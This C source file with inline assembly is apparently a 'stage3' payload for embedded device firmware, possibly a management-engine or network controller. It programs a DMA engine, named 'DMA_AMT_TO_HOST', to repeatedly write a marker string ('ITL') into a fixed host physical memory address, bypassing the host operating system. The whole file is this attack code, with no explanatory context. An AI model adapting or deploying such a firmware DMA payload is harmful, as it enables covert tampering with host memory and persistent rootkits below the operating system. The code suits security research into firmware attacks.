void wr_di(unsigned int addr, unsigned int value)
{
	asm("st.di r1, [r0]");
}

unsigned int rd_di(unsigned int addr)
{
	asm("ld.di r0, [r0]");
}

void sr(unsigned int addr, unsigned int value)
{
	asm("sr r1, [r0]");
}

unsigned int lr(unsigned int addr)
{
	asm("lr r0, [r0]");
}

void wrcache(unsigned int addr, unsigned int value)
{
	*(unsigned int *) addr = value;
	wr_di(addr, value);
}

void mmset(unsigned int *addr, unsigned int what, int size)
{
	unsigned int val =
	    what + (what << 8) + (what << 16) + (what << 24);
	int i;
	for (i = 0; i < size / 4; i++)
		wrcache(addr + i, val);
}

struct dmadesc_t {
	unsigned int src_lo;
	unsigned int src_hi;
	unsigned int dst_lo;
	unsigned int dst_hi;
	unsigned int count;
	unsigned int res1;
	unsigned int res2;
	unsigned int res3;
	unsigned int redund[8];
};
char descbuf[4096];
struct dmadesc_t *dd;
int nrloop = 1;
int loop_idx = 1;

#define HOST_ADDR	0x33c1c000
#define LOOP_DIVISOR 	9
#define LOOP_MASK	((1<<LOOP_DIVISOR)-1)
#define MAX_WRITES 	100
#define DATA		"ITL"

#define DMA_ENG_SRBASE	0x5010
#define DMA_ENG_COMPLETION_SREG 0x5001
#define DELAY_LOOP	0x10000
#define DMA_AMT_TO_HOST	0x189

void start_dma(unsigned int idx)
{
	int i;
	unsigned int srbase = DMA_ENG_SRBASE + 4 * idx;
	unsigned int lsrc = DATA;
	mmset(&dd[idx], 0, sizeof dd[idx]);
	wrcache(&dd[idx].src_lo, lsrc);
	wrcache(&dd[idx].dst_lo,
		HOST_ADDR + (loop_idx >> LOOP_DIVISOR) * 4);
	wrcache(&dd[idx].count, sizeof(DATA));
	sr(srbase + 1, &dd[idx]);
	sr(srbase + 2, 0);
	sr(srbase + 3, 0);
	sr(srbase + 0, DMA_AMT_TO_HOST);
}

void finish_dma(unsigned int r17)
{
	unsigned int r0, r1, r14, r15, r16;
	r1 = DMA_ENG_SRBASE + r17 * 4;
	r0 = lr(r1);
	r0 &= 0xFFFFFFFE;
	sr(r1, r0);
	r0 = r17 * 4;
	r15 = 2 << r0;
	r16 = 4 << r0;
	r14 = lr(DMA_ENG_COMPLETION_SREG);
	if (!(r14 & r15))
		return;
	nrloop = 1;
	do {
		r0 = lr(DMA_ENG_COMPLETION_SREG);
		nrloop++;
	} while (nrloop < DELAY_LOOP && (r0 & r16));
	sr(DMA_ENG_COMPLETION_SREG, r15);
}

#define ONE_OF_DMA_ENGINES 0
void doit()
{
	int i;
	start_dma(ONE_OF_DMA_ENGINES);
	for (i = 0; i < DELAY_LOOP; i++);
	finish_dma(ONE_OF_DMA_ENGINES);
}

unsigned int stage3(unsigned idx, unsigned int *regs)
{
	dd = ((unsigned int) descbuf + 255) & 0xffffff00;
	if ((loop_idx >> LOOP_DIVISOR) > MAX_WRITES)
		return 0;
	loop_idx++;
	if (!(loop_idx & LOOP_MASK))
		doit();
	return 0;
}
